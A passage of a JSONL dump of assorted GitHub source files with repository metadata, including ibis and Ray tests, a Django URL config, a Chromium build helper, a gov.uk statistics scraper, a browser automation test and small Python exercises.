assert_equal(result, expected)\n\n\ndef test_integer_promotions(sql_table, function):\n t = sql_table\n\n expr = function(t.v3, t.v4)\n assert isinstance(expr, ir.IntegerColumn)\n\n expr = function(5, t.v3)\n assert isinstance(expr, ir.IntegerColumn)\n\n expr = function(5, 12)\n assert isinstance(expr, ir.IntegerScalar)\n\n\ndef test_floats(sql_table, function):\n t = sql_table\n\n expr = function(t.v5)\n assert isinstance(expr, ir.FloatingColumn)\n\n expr = function(5.5, t.v5)\n assert isinstance(expr, ir.FloatingColumn)\n\n expr = function(5.5, 5)\n assert isinstance(expr, ir.FloatingScalar)\n\n\ndef test_deferred(sql_table, function):\n expr = function(None, _.v3, 2)\n res = expr.resolve(sql_table)\n sol = function(None, sql_table.v3, 2)\n assert res.equals(sol)\n\n\ndef test_no_arguments_errors(function):\n with pytest.raises(\n SignatureValidationError, match=\".+ has failed due to the following errors:\"\n ):\n function()\n","repo_name":"ibis-project/ibis","sub_path":"ibis/tests/expr/test_sql_builtins.py","file_name":"test_sql_builtins.py","file_ext":"py","file_size_in_byte":5842,"program_lang":"python","lang":"en","doc_type":"code","stars":3246,"dataset":"github-code","pt":"52"} +{"seq_id":"43447003583","text":"def solution(s):\n answer = True\n dic = {'p': 0, 'y': 0}\n \n for i in s.lower():\n if i == 'p':\n dic['p'] += 1\n elif i == 'y':\n dic['y'] += 1\n \n if dic['p'] == dic['y']:\n return True\n else:\n return False\n\n","repo_name":"dd-jero/CodeProblem","sub_path":"프로그래머스/lv1/12916. 문자열 내 p와 y의 개수/문자열 내 p와 y의 개수.py","file_name":"문자열 내 p와 y의 개수.py","file_ext":"py","file_size_in_byte":273,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"33509627183","text":"from ray.util.client.ray_client_helpers import ray_start_client_server\nfrom unittest.mock import Mock\nimport pytest\n\n\ndef test_dataclient_disconnect_on_request():\n with ray_start_client_server() as ray:\n assert ray.is_connected()\n\n @ray.remote\n def f():\n return 42\n\n assert ray.get(f.remote()) == 42\n # Force grpc to error by sending garbage request\n with pytest.raises(ConnectionError):\n ray.worker.data_client._blocking_send(Mock())\n\n # Client should be disconnected\n assert not ray.is_connected()\n\n # Test that a new connection can be made\n connection_data = ray.connect(\"localhost:50051\")\n assert connection_data[\"num_clients\"] == 1\n assert ray.get(f.remote()) == 42\n\n\ndef test_dataclient_disconnect_before_request():\n with ray_start_client_server() as ray:\n assert ray.is_connected()\n\n @ray.remote\n def f():\n return 42\n\n assert ray.get(f.remote()) == 42\n # Force grpc to error by queueing garbage request. This simulates\n # the data channel shutting down for connection issues between\n # different remote calls.\n ray.worker.data_client.request_queue.put(Mock())\n\n # The next remote call should error since the data channel has shut\n # down, which should also disconnect the client.\n with pytest.raises(ConnectionError):\n ray.get(f.remote())\n\n # Client should be disconnected\n assert not ray.is_connected()\n\n # Test that a new connection can be made\n connection_data = ray.connect(\"localhost:50051\")\n assert connection_data[\"num_clients\"] == 1\n assert ray.get(f.remote()) == 42\n\n\nif __name__ == \"__main__\":\n import sys\n sys.exit(pytest.main([\"-v\", __file__]))\n","repo_name":"yangysc/ResiNet","sub_path":"ray-master/python/ray/tests/test_dataclient_disconnect.py","file_name":"test_dataclient_disconnect.py","file_ext":"py","file_size_in_byte":1823,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"52"} +{"seq_id":"11585180307","text":"\"\"\"projet_Uds URL Configuration\n\nThe `urlpatterns` list routes URLs to views. For more information please see:\n https://docs.djangoproject.com/en/2.2/topics/http/urls/\nExamples:\nFunction views\n 1. Add an import: from my_app import views\n 2. Add a URL to urlpatterns: path('', views.home, name='home')\nClass-based views\n 1. Add an import: from other_app.views import Home\n 2. Add a URL to urlpatterns: path('', Home.as_view(), name='home')\nIncluding another URLconf\n 1. Import the include() function: from django.urls import include, path\n 2. Add a URL to urlpatterns: path('blog/', include('blog.urls'))\n\"\"\"\nfrom unicodedata import name\nfrom django.contrib import admin\nfrom django.urls import include, path\nfrom django.views import View\nfrom gamaistatisticsapp import views\n\nurlpatterns = [\n path('admin/', admin.site.urls),\n path('etudiant/',views.home1,name=\"home1\"),\n path('delete//',views.delete_data,name=\"deletedata\"),\n path('',include('users.urls')),\n \n path('statistique/',views.statistique,name='statistique'),\n path('statistique1/',views.statistique1,name='statistique1'),\n path('stat3/',views.stat3,name='stat3'),\n path('stat4/',views.stat4,name='stat4'),\n path('stat5/',views.stat5,name='stat5'),\n path('stat6/',views.stat6,name='stat6'),\n path('stat7/',views.stat7,name='stat7'),\n path('stat8/',views.stat8,name='stat8'),\n path('moyenne/',views.moyenne1,name='moyenne'),\n path('delete1//',views.delete_note,name=\"deletenote\"),\n \n path('/',views.update_note,name=\"updatenote\"),\n path('/',views.update_data,name=\"updatedata\"),\n]\n","repo_name":"ernestfotseu/gamairoot-ce","sub_path":"gamairoot/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1653,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"4499601953","text":"import sys\ninput = sys.stdin.readline\n\"\"\"\n15486번 퇴사 2\n\nDP입니다.\n네, DP입니다..\n\n퇴사 1번은 n이 15가 최대라 브루트포스도 가능하고,\n이 문제, 퇴사 2는 DP만 가능하도록 n을 150만..까지 늘려놨습니다.\n\n문제의 요지는,\n어떤 수열의 원소를 N개 준다고 합니다.\n수열의 각 원소는 수 두개, a와 b로 이루어져있습니다.\n첫번째 원소부터 아래의 두 동작중 하나를 할 수 있습니다.\n\n1. b만큼 점수를 얻고 인덱스에 a를 더합니다.\n만약 현재 인덱스에 a를 더했을 때 최대인덱스를 초과한다면, 이 동작은 할 수 없습니다.\n2. 이번 원소를 스킵하고, 인덱스에 1을 더합니다. 얻는 점수는 없습니다.\n이렇게해서, 마지막인덱스까지 갔을 때 얻을 수 있는 최대점수를 구하면 됩니다.\n\"\"\"\nn = int(input())\narr = [list(map(int, input().split())) for _ in ' '*n]\ndp = [0]*(n+1)\nfor i in range(n):\n # 이 다음 인덱스에, 현재 최댓값과 그 인덱스에 있는 값중 더 큰값을 넣어줍니다.\n dp[i+1] = max(dp[i+1], dp[i])\n if arr[i][0]+i > n: continue # 이게 true가되면 조건상 해당 상담은 불가능합니다.\n dp[i] += arr[i][1] # 현재 dp에는 점수를 추가해주고..\n dp[i+arr[i][0]] = max(dp[i], dp[i+arr[i][0]]) # 이 다음 상담가능 일자에 더 큰 값을 넣어줍니다.\nprint(max(dp)) # 이중 최댓값을 출력합니다.\n","repo_name":"S-DPR/DSA","sub_path":"PS/Python/BJ_15486 (퇴사 2).py","file_name":"BJ_15486 (퇴사 2).py","file_ext":"py","file_size_in_byte":1460,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"34924666719","text":"import sys\nsys.path.append('/home/xutun/transAs/src')\nfrom ttlib.basicInfo import bainfo\nfrom ttlib.basicInfo import calDis\nimport ttlib.geneStructure.nameServer as ns\nimport pandas as pd\nclass ep:\n def __init__(self,line):\n l = line.split('\\t')\n self.ga = l[0]\n self.ea = int(l[1])\n self.pa = bainfo(l[2])\n self.gb = l[3]\n self.eb = int(l[4])\n self.pb = bainfo(l[5])\n\n def toStr(self):\n return f'{self.ga}\\t{self.ea}\\t{self.gb}\\t{self.eb}'\n\n def simplePrint(self):\n print(self.ga,self.ea,self.gb,self.eb,sep='\\t')\n\n\nclass epPair:\n def __init__(self,ep1,ep2):\n self.ep1 = ep1\n self.ep2 = ep2\n self.disa = calDis(ep1.pa,ep2.pa)\n self.disb = calDis(ep1.pb,ep2.pb)\n self.diffDis = self.disa - self.disb\n self.ena = self.ep1.ea - self.ep2.ea\n self.enb = self.ep1.eb - self.ep2.eb\n if self.ena < 0:\n self.ena = -self.ena\n self.enb = -self.enb\n self.diffEn = self.ena - self.enb\n def toStr(self):\n return f'{self.ep1.ga}\\t{self.ep1.gb}\\t{self.ena}\\t{self.enb}\\t{self.diffEn}\\t{self.disa}\\t{self.disb}\\t{self.diffDis}\\t{self.ep1.ea}\\t{self.ep2.ea}\\t{self.ep1.eb}\\t{self.ep2.eb}'\n\nclass epChain:\n def __init__(self,epList):\n self.eps = epList\n\n def geneAdjEpPair(self):\n relList = []\n for i in range(len(self.eps)-1):\n relList.append(epPair(self.eps[i],self.eps[i+1]))\n return relList\n\n def toStr(self):\n retStr = ''\n for ep in self.eps:\n retStr = retStr + ep.toStr() + '\\n'\n return retStr\n\n def print(self):\n for ep in self.eps:\n ep.simplePrint()\n\n","repo_name":"xjtu-omics/opium_poppy_isoseq","sub_path":"ttlib/geneStructure/dataStruct.py","file_name":"dataStruct.py","file_ext":"py","file_size_in_byte":1712,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"12793482665","text":"import argparse\nimport os\nimport shutil\nimport sys\nimport tempfile\nimport zipfile\n\nfrom util import build_utils\nfrom util import jar_info_utils\n\n\ndef _FullJavaNameFromClassFilePath(path):\n # Input: base/android/java/src/org/chromium/Foo.class\n # Output: base.android.java.src.org.chromium.Foo\n if not path.endswith('.class'):\n return ''\n path = os.path.splitext(path)[0]\n parts = []\n while path:\n # Use split to be platform independent.\n head, tail = os.path.split(path)\n path = head\n parts.append(tail)\n parts.reverse() # Package comes first\n return '.'.join(parts)\n\n\ndef _MergeInfoFiles(output, jar_paths):\n \"\"\"Merge several .jar.info files to generate an .apk.jar.info.\n\n Args:\n output: output file path.\n jar_paths: List of .jar file paths for the target apk.\n \"\"\"\n info_data = dict()\n for jar_path in jar_paths:\n # android_java_prebuilt adds jar files in the src directory (relative to\n # the output directory, usually ../../third_party/example.jar).\n # android_aar_prebuilt collects jar files in the aar file and uses the\n # java_prebuilt rule to generate gen/example/classes.jar files.\n # We scan these prebuilt jars to parse each class path for the FQN. This\n # allows us to later map these classes back to their respective src\n # directories.\n jar_info_path = jar_path + '.info'\n if os.path.exists(jar_info_path):\n info_data.update(jar_info_utils.ParseJarInfoFile(jar_path + '.info'))\n else:\n with zipfile.ZipFile(jar_path) as zip_info:\n for path in zip_info.namelist():\n fully_qualified_name = _FullJavaNameFromClassFilePath(path)\n if fully_qualified_name:\n info_data[fully_qualified_name] = jar_path\n\n jar_info_utils.WriteJarInfoFile(output, info_data)\n\n\ndef main(args):\n args = build_utils.ExpandFileArgs(args)\n parser = argparse.ArgumentParser(description=__doc__)\n build_utils.AddDepfileOption(parser)\n parser.add_argument('--output', required=True,\n help='Output .apk.jar.info file')\n parser.add_argument('--apk-jar-file', required=True,\n help='Path to main .jar file for this APK.')\n parser.add_argument('--dep-jar-files', required=True,\n help='GN-list of dependent .jar file paths')\n\n options = parser.parse_args(args)\n options.dep_jar_files = build_utils.ParseGnList(options.dep_jar_files)\n jar_files = [ options.apk_jar_file ] + options.dep_jar_files\n\n def _OnStaleMd5():\n with tempfile.NamedTemporaryFile() as tmp_file:\n _MergeInfoFiles(tmp_file.name, jar_files)\n shutil.move(tmp_file.name, options.output)\n tmp_file.delete = False\n\n build_utils.CallAndWriteDepfileIfStale(\n _OnStaleMd5, options,\n input_paths=jar_files,\n output_paths=[options.output])\n\n\nif __name__ == '__main__':\n main(sys.argv[1:])\n","repo_name":"kiwibrowser/src","sub_path":"build/android/gyp/merge_jar_info_files.py","file_name":"merge_jar_info_files.py","file_ext":"py","file_size_in_byte":2859,"program_lang":"python","lang":"en","doc_type":"code","stars":2475,"dataset":"github-code","pt":"52"} +{"seq_id":"33882724724","text":"from django.shortcuts import render, get_object_or_404\nfrom .models import News\nfrom django.core.paginator import Paginator\n\ndef listNews(request):\n allnews = News.objects.all()#[:3]\n paginator = Paginator(allnews, 2) # Show 21 contacts per page.\n page_number = request.GET.get('page')\n page_obj = paginator.get_page(page_number)\n \n context = {\n 'page_obj': page_obj\n }\n return render(request, 'news/news.html', context)\n\ndef news_detail(request, news_id):\n detail = get_object_or_404(News, id=news_id)\n #detail = TouristAttraction.objects.get(id=id)\n return render(request, 'news/news_detail.html', context={'detail': detail})","repo_name":"husna0112/tourist_attraction","sub_path":"travel/news/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":671,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"31810359658","text":"## Opereradores lógicos com IF/ELSE\n#nome = input(\"Qual o seu nome: \")\n\n#if \"Vitor\" != \"Vitor\":\n# print(\"Acertou!\")\n#else:\n# print(\"Errou!\")\n\n# Operador números\n#if 10 != 20:\n# print(\"Resultado caso verdadeiro\")\n#else:\n# print(\"Resultado caso falso\")\n\n\n# == Igualguade\n# != Diferença\n# > Maior que\n# < Menor que\n# >= Maior ou igual\n# <= Menor ou igual\n\nnome_1 = \"Vitor\"\nnome_2 = \"Italo\"\n\nnumero_1 = 10\nnumero_2 = 134.34\n\n# Operador and (todas condições iguais)\n#if ((nome_1 != nome_2) and (numero_1 == numero_2)):\n# print(True)\n#else:\n# print(False)\n\n# Operador or (pelo menos uma deve ser veradeira)\n# if ((nome_1 != nome_2) or (numero_1 == numero_2)):\n# print(True)\n# else:\n# print(False)\n\n# Estrutura IF/ELIF/ELSE\n# if nome_1 == nome_2:\n# print(10)\n# elif numero_1 == numero_2:\n# print(20)\n# else:\n# print(False)\n\n# Operadores juntos\n# if (nome_1 != nome_2 or numero_1 == numero_2) and numero_1 == numero_2:\n# print(True)\n# else:\n# print(False)\n\n\n## WHILE (cuidado com loops infinitos)\nnome = \"Gui\"\ntentativas = 3\n#while tentativas > 0:\n# nome = input(\"Qual o código: \")\n# tentativas = tentativas - 1\n\n## FOR\n#soma_letras = \"\"\n#for letra in \"Vitor\":\n# print(letra)\n# soma_letras += letra\n#\n#print(soma_letras)\n\n#soma_notas = 0\n#for nota in [1, 2, 3, 5, 6, 7, 8]:\n# print(nota)\n# soma_notas = soma_notas + nota\n#\n#print(soma_notas)\n\n## FOR + IF\ndef valida_nota(nota):\n if nota >= 8:\n return \"Gabaritou\"\n elif nota >=5:\n return \"Cabeçudo\"\n else:\n return \"Estude mais\"\n\ndef validacao_notas(lista_notas):\n retornos = []\n for nota in lista_notas:\n resposta = valida_nota(nota)\n retornos.append(resposta)\n\n# lista_notas_b1 = [1, 2, 3, 5, 6, 7, 8]\n# resultado_b1 = validacao_notas(lista_notas_b1)\n# print(resultado_b1)\n\n# lista_notas_b2 = [2, 3, 4, 6, 7, 8, 9]\n# resultado_b2 = validacao_notas(lista_notas_b2)\n# print(resultado_b2)\n\n#nota = 4\n#resultado = valida_nota(nota)\n#print(resultado)\n\n\n## Dicionários\nalunos = { \"aluno_1\": {\n \"nome\": \"Italo\",\n \"sobrenome\": \"Medeiros\",\n \"localizacao\": \"Ribeirão\",\n \"notas\": [1, 2, 3, 4, 5, 6, 7, 8],\n \"idade\": 23\n },\n \"aluno_2\": {\n \"nome\": \"Guilherme\",\n \"sobrenome\": \"Canechia\",\n \"localizacao\": \"SP\",\n \"notas\": [1, 2, 3, 4, 5, 6, 7, 8],\n \"idade\": 23\n },\n \"aluno_3\": {\n \"nome\": \"Ellen\",\n \"sobrenome\": \"Freitas\",\n \"localizacao\": {\n \"Cidade\": \"RJ\",\n \"Bairro\": \"Bangu\"\n },\n \"notas\": [1, 2, 3, 4, 5, 6, 7, 8],\n \"idade\": 23\n },\n}\n\n# for chave, valor in alunos.items():\n# for sub_chave, sub_valor in valor.items():\n# print(sub_chave)\n# print(sub_valor)\n# input()\n\nlista_nomes = []\nlista_notas = []\n\nfor chave in alunos:\n nome = alunos[chave][\"nome\"]\n print(\"Notas do aluno: \", nome)\n #lista_nomes.append(nome)\n\n for nota in alunos[chave][\"notas\"]:\n resultado = valida_nota(nota)\n print(nota, nota, nota, nota, nota , nota)\n #notas = alunos[chave][\"notas\"]\n #lista_notas.append(notas)\n input()\n","repo_name":"270469Jf/curso_python","sub_path":"arquivo02.py","file_name":"arquivo02.py","file_ext":"py","file_size_in_byte":3381,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"7914056604","text":"\"\"\"The example uses browser_bot to launch Chromium and scarpy on the remote desktop.\"\"\"\nfrom __future__ import annotations\n\nimport logging\nimport os\nfrom pathlib import Path\nfrom typing import Optional\n\nfrom libs.utils import preprocess_embeded_testweb as prepress\nfrom libs.utils import require_environ, vm_context\nfrom pyvirtualdisplay import Display\n\nlogger = logging.getLogger(__name__)\n\n# workaround for mouseinfo 初始化的时候DISPLAY未知或者无法连接\n# 1. 先start VirtualDisplay,再引入pyautogui/mouseinfo依赖的包\ndisp = Display(visible=False, size=(1440, 900), color_depth=24, use_xauth=True).start()\nfrom browser_guaca_screens import GuacaLoginScreen # noqa: E402\nfrom browser_guaca_screens import WindowsBrowserScreen # noqa: E402\nfrom libs.browser_bot import BrowserBot # noqa: E402\n\n# # 2. 通过atexit.register注册关闭display的handler.\n# # 本module不会当成共用lib被其它modulee使用,所以不用这种方案\n\n# 2. 在__main__函数中try finally中关闭即可,见__main__\n\n\n@require_environ([\"TESTWEB\", \"GUACA_URL\", \"BROWSER_NAME\", \"GUACA_BROWSER\"])\n@vm_context(os.environ.get(\"VM_RESTAPI\"), os.environ.get(\"GUACA_BROWSER\"))\ndef test_windows_browser(screenshots: Optional[Path]) -> None:\n \"\"\"Test IE/Edge through remote desktop.\"\"\"\n browser_name = os.environ.get(\"BROWSER_NAME\")\n guaca_browser = guaca_user = os.environ.get(\"GUACA_BROWSER\")\n guaca = os.environ.get(\"GUACA_URL\")\n\n # Chrome doesn't honor policy PasswordManagerEnabled:false.\n # The Save Password bubble still show. Need to use --incognito.\n # Chromeium/FF is ok with policify file.\n # 注意:当使用incognito模式时,背景是黑色,ocr会有一定影响。\n # 故:推荐使用FF或者Chromium来测试Guacamole场景\n # extra_options = [\"--incognito\"] if browser_name == \"Chrome\" else None\n extra_options = None\n\n with BrowserBot.get(browser_name, extra_options).open(guaca) as browser:\n GuacaLoginScreen(browser).login(guaca_user, \"test\", 120, screenshots)\n with WindowsBrowserScreen.get(guaca_browser, browser).open(\n timeout=120, log_screenshot_folder=screenshots\n ) as win_browser:\n _test_action(win_browser, os.environ.get(\"TESTWEB\", \"\"), screenshots)\n logger.info(\"Done\")\n\n\ndef _test_action(\n action_browser: WindowsBrowserScreen, testweb: str, screenshots: Optional[Path]\n) -> None:\n \"\"\"在被测浏览器上面执行操作.\"\"\"\n action_browser.browser.click_and_send_keys(\n testweb,\n point=action_browser.adddress_bar,\n append_enter=True,\n clear_before=True,\n log_screenshot_folder=screenshots,\n )\n action_browser.browser.click_by_word(\n \"SetUserCookie\",\n confidence=0.5,\n timeout=60,\n preprocess=prepress,\n log_screenshot_folder=screenshots,\n )\n action_browser.browser.locate_word(\n \"AUTOMATED\",\n timeout=60,\n preprocess=prepress,\n )\n\n\nif __name__ == \"__main__\":\n _DEBUG = os.environ.get(\"DEBUG\", \"0\") == \"1\"\n logging.basicConfig(\n level=logging.DEBUG if _DEBUG else logging.INFO,\n format=\"%(asctime)s | %(name)s | %(levelname)s | %(lineno)d | %(message)s\",\n )\n _screenshoot_evn = os.environ.get(\"SCREENSHOTS_FOLDER\", None)\n screenshots = Path(_screenshoot_evn) if _screenshoot_evn and _DEBUG else None\n\n try:\n test_windows_browser(screenshots)\n finally:\n disp.stop()\n","repo_name":"liuliwh/bot_cllick","sub_path":"examples/test_browser_in_guca.py","file_name":"test_browser_in_guca.py","file_ext":"py","file_size_in_byte":3461,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"17760626845","text":"import hashlib\n\nBUFFER_SIZE = 8000000 # 1 MB\n\n\ndef hash_file(path):\n \"\"\"\n Hashes the file using its first megabyte\n\n :param path: Full path of the file\n :type path: String\n :return: Hashed value in hexadecimal format\n :rtype: String\n \"\"\"\n md5 = hashlib.md5()\n with open(path, \"rb\") as file:\n data = file.read(BUFFER_SIZE)\n md5.update(data)\n return md5.hexdigest()\n","repo_name":"debrief/pepys-import","sub_path":"pepys_import/utils/datafile_utils.py","file_name":"datafile_utils.py","file_ext":"py","file_size_in_byte":409,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"52"} +{"seq_id":"39109596646","text":"#!/usr/bin/env python3\nimport re\nimport time\nfrom datetime import datetime, timezone\n\nfrom cachecontrol import CacheControl\nfrom cachecontrol.caches import FileCache\nfrom cachecontrol.heuristics import LastModified\nfrom rdflib import Graph, URIRef, Literal, ConjunctiveGraph\nfrom rdflib.namespace import Namespace, DCTERMS, RDF\nfrom requests import Session\nfrom urllib.parse import urljoin\n\nfrom sqlobject import connectionForURI, sqlhub, SQLObject, StringCol, DateTimeCol, IntCol, EnumCol, RelatedJoin, \\\n SQLObjectNotFound\n\nconnection = connectionForURI('mysql://solar:system@sqldb/stats?charset=utf8')\nsqlhub.processConnection = connection\n\nDCAT = Namespace('http://www.w3.org/ns/dcat#')\nGDP = Namespace('http://gss-data.org.uk/def/gdp#')\n\ns = CacheControl(Session(),\n cache=FileCache('.cache'),\n heuristic=LastModified())\n\norgs = {org['label']['value']: org['org']['value'] for org in s.post(\n 'https://staging.gss-data.org.uk/sparql',\n headers={'Accept': 'application/sparql-results+json'},\n data={'query': '''\nPREFIX org: \nPREFIX rdfs: \nSELECT DISTINCT ?org ?label\nWHERE {\n ?org a org:Organization ;\n rdfs:label ?label .\n}'''}).json().get('results', {}).get('bindings', [])}\n\n\nclass Organisation(SQLObject):\n class sqlmeta:\n table = 'wh_organisation'\n uri = StringCol(alternateID=True, length=255)\n label = StringCol()\n datasets = RelatedJoin('Dataset')\n\n\nclass Dataset(SQLObject):\n class sqlmeta:\n table = 'wh_dataset'\n whitehall_id = IntCol(alternateID=True)\n stats_type = EnumCol(enumValues=['Official Statistics', 'National Statistics', 'Statistical data set', None],\n default=None)\n title = StringCol()\n url = StringCol(alternateID=True, length=255)\n orgs = RelatedJoin('Organisation')\n publication_date = DateTimeCol()\n government_name = StringCol()\n collections = RelatedJoin('Collection')\n\n\nclass Collection(SQLObject):\n class sqlmeta:\n table = 'wh_collection'\n uri = StringCol()\n label = StringCol()\n datasets = RelatedJoin('Dataset')\n\n\nOrganisation.createTable(ifNotExists=True)\nDataset.createTable(ifNotExists=True)\nCollection.createTable(ifNotExists=True)\n\n\nfor label, uri in orgs.items():\n try:\n org = Organisation.byUri(uri)\n org.set(label=label)\n except SQLObjectNotFound:\n org = Organisation(uri=uri, label=label)\n\ndatasets_url_base = 'https://www.gov.uk/government/statistics.json'\ngov_uk_search = 'https://www.gov.uk/api/search.json'\n\ns = CacheControl(Session(),\n cache=FileCache('.cache'),\n heuristic=LastModified())\nstill_going = True\n\nabbr_re = re.compile(r'')\ncollection_re = re.compile(r'Part of a collection: ')\n\n\ndef fetch_carefully(url):\n tries = 0\n holdoff = 5\n while tries < 10:\n resp = s.get(url)\n if resp.status_code == 200:\n try:\n return resp.json()\n except:\n pass\n time.sleep(holdoff)\n tries = tries + 1\n holdoff = holdoff * 2\n\n\nwhile still_going:\n\n datasets = fetch_carefully(datasets_url)\n fresh_datasets = False\n for res_obj in datasets['results']:\n res = res_obj['result']\n publishers = []\n issued = None\n collection = None\n orgs_list = res['organisations']\n\n for label, uri in orgs.items():\n if orgs_list.endswith(label) or \\\n f'title=\"{label}\"' in orgs_list or \\\n f'{label} and ' in orgs_list or \\\n f'{label}, ' in orgs_list:\n publishers.append(Organisation.byUri(uri))\n issued = datetime.fromisoformat(res['public_timestamp']).astimezone(timezone.utc)\n if 'publication_collections' in res and res['publication_collections'] is not None:\n coll_match = collection_re.match(res['publication_collections'])\n if coll_match:\n collection = coll_match.group(1)\n landingPage = urljoin(datasets_url, res['url'])\n try:\n ds = Dataset.byUrl(landingPage)\n if ds.publication_date != issued.replace(tzinfo=None) or set(publishers) != set(ds.orgs):\n fresh_datasets = True\n ds.set(\n whitehall_id=res['id'],\n stats_type=res['display_type'],\n title=res['title'],\n url=landingPage,\n publication_date=issued,\n government_name=res['government_name']\n )\n to_add = set(publishers) - set(ds.orgs)\n to_remove = set(ds.orgs) - set(publishers)\n for org in to_remove:\n ds.removeOrganisation(org)\n for org in to_add:\n ds.addOrganisation(org)\n except SQLObjectNotFound:\n fresh_datasets = True\n ds = Dataset(\n whitehall_id=res['id'],\n stats_type=res['display_type'],\n title=res['title'],\n url=landingPage,\n publication_date=issued,\n government_name=res['government_name']\n )\n for org in publishers:\n ds.addOrganisation(org)\n\n if fresh_datasets and 'next_page_url' in datasets:\n datasets_url = urljoin(datasets_url, datasets['next_page_url'])\n still_going = True\n else:\n still_going = False\n","repo_name":"GSS-Cogs/solar-system","sub_path":"registries/fetch_whitehall.py","file_name":"fetch_whitehall.py","file_ext":"py","file_size_in_byte":5568,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"40995778741","text":"\"\"\"\nMain CLI entrypoint for `handsdown`.\n\"\"\"\nimport sys\nfrom typing import Type\n\nfrom handsdown.cli_parser import CLINamespace, parse_args\nfrom handsdown.constants import EXCLUDE_EXPRS, SOURCES_GLOB, Theme\nfrom handsdown.exceptions import GeneratorError\nfrom handsdown.generators.base import BaseGenerator\nfrom handsdown.generators.material import MaterialGenerator\nfrom handsdown.generators.rtd import RTDGenerator\nfrom handsdown.utils.logger import get_logger\nfrom handsdown.utils.path_finder import PathFinder\n\n\ndef select_generator_cls(theme: Theme) -> Type[BaseGenerator]:\n \"\"\"\n Select a generator based on the theme.\n \"\"\"\n return {\n Theme.RTD: RTDGenerator,\n Theme.MD: MaterialGenerator,\n }[theme]\n\n\ndef api(args: CLINamespace) -> None:\n path_finder = (\n PathFinder(args.input_path).exclude(*(EXCLUDE_EXPRS + args.exclude)).include(*args.include)\n )\n generator_cls = select_generator_cls(args.theme)\n\n generator = generator_cls(\n project_name=args.project_name,\n input_path=args.input_path,\n output_path=args.output_path,\n source_paths=path_finder.glob(SOURCES_GLOB),\n raise_errors=args.panic,\n source_code_url=args.get_source_code_url(),\n source_code_path=args.source_code_path,\n toc_depth=args.toc_depth,\n encoding=args.encoding,\n )\n if args.files:\n for path in args.files:\n generator.generate_doc(path)\n else:\n generator.generate_docs()\n generator.generate_index()\n if args.cleanup:\n generator.cleanup_old_docs()\n\n if args.create_configs:\n generator.generate_external_configs()\n\n\ndef main() -> None:\n \"\"\"\n Main entrypoint for CLI.\n \"\"\"\n args = parse_args(sys.argv[1:])\n logger = get_logger(level=args.log_level)\n\n try:\n api(args)\n except GeneratorError as e:\n logger.error(e)\n sys.exit(1)\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"vemel/handsdown","sub_path":"handsdown/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1960,"program_lang":"python","lang":"en","doc_type":"code","stars":70,"dataset":"github-code","pt":"52"} +{"seq_id":"72395548325","text":"\"\"\"\nsolv_pred_cand_edit inlcudes user iteractive functions to edit current candidate cas list\n\"\"\"\n\nimport solv_pred_valid_check as sp_vld_chk\nimport solv_pred_io as sp_io\nimport solv_pred_reg_txt as sp_rtxt\n\ndef remove_cas() -> list:\n \"\"\"return a user-specified cas list to be removed.\n \n Returns:\n list: user-specified cas to be removed.\n\n \"\"\"\n to_continue_rm_cas = True\n\n cas_to_remove = []\n\n # generate cas_to_remove list\n\n while to_continue_rm_cas:\n\n print(\"Do you want to remove any solvent? \\n\")\n remove_check = sp_io.continue_check()\n\n if remove_check == 1:\n\n cas_to_remove_usr = sp_io.input_cas()\n\n elif remove_check == 0:\n\n cas_to_remove_usr = []\n \n print('Continue? ')\n to_continue_rm_cas = sp_vld_chk.finish_check()\n\n else:\n\n cas_to_remove_usr = []\n sp_vld_chk.invalid_input()\n \n cas_to_remove += cas_to_remove_usr\n\n # check if the cas_to_remove list is empty\n\n if len(cas_to_remove) != 0:\n\n print('The following solvents will be removed: ')\n print(cas_to_remove)\n \n else:\n\n print('No solvent will be removed.')\n \n return cas_to_remove\n\n\ndef add_cas() -> list:\n \"\"\"Return list of additional user-specified candidate cas before submission.\n\n Returns:\n list: additional cas to be included.\n \"\"\"\n\n to_continue_add_cas = True\n\n cas_to_add = []\n\n while to_continue_add_cas:\n\n print(\"Do you want to add any solvent? \\n\")\n add_check = sp_io.continue_check()\n\n if add_check == 1:\n\n cas_to_add_usr = sp_io.input_cas()\n to_continue_add_cas = False\n\n elif add_check == 0:\n\n cas_to_add_usr = []\n print('Continue?')\n\n to_continue_add_cas = sp_vld_chk.finish_check()\n\n else:\n sp_vld_chk.invalid_input()\n \n cas_to_add += cas_to_add_usr\n\n \n if len(cas_to_add) != 0:\n\n print('The following solvents will be added: ')\n print(cas_to_add)\n \n else:\n \n print('No solvent will be added.')\n \n return cas_to_add\n\n\ndef edit_cand_cas_option(current_cand_cas_list: list, operation: str) -> list:\n \"\"\"Return confirmed candidate list before final submission.\n\n Args:\n current_cand_cas_list (list): current candidates cas\n operation (str): 'a' - add, 'rm' - remove, 'q' - quit, 'n' - not continue, 'v' - view current list\n\n Returns:\n list: edited candidate cas\n \"\"\"\n\n to_continue_ed_cas_opt = True\n\n crt_cand_cas_list = sp_vld_chk.rm_repeat(current_cand_cas_list)\n\n while to_continue_ed_cas_opt:\n \n if operation == 'n': # submit\n\n to_continue_ed_cas_opt = False\n\n elif operation == 'a': # add\n\n cas_to_add_list = add_cas()\n\n crt_cand_cas_list += cas_to_add_list\n crt_cand_cas_list = sp_vld_chk.rm_repeat(crt_cand_cas_list)\n\n print('Continue?')\n to_continue_ed_cas_opt = sp_vld_chk.finish_check()\n\n print('Current candidate list: ')\n print(crt_cand_cas_list)\n \n elif operation == 'rm': # remove\n \n 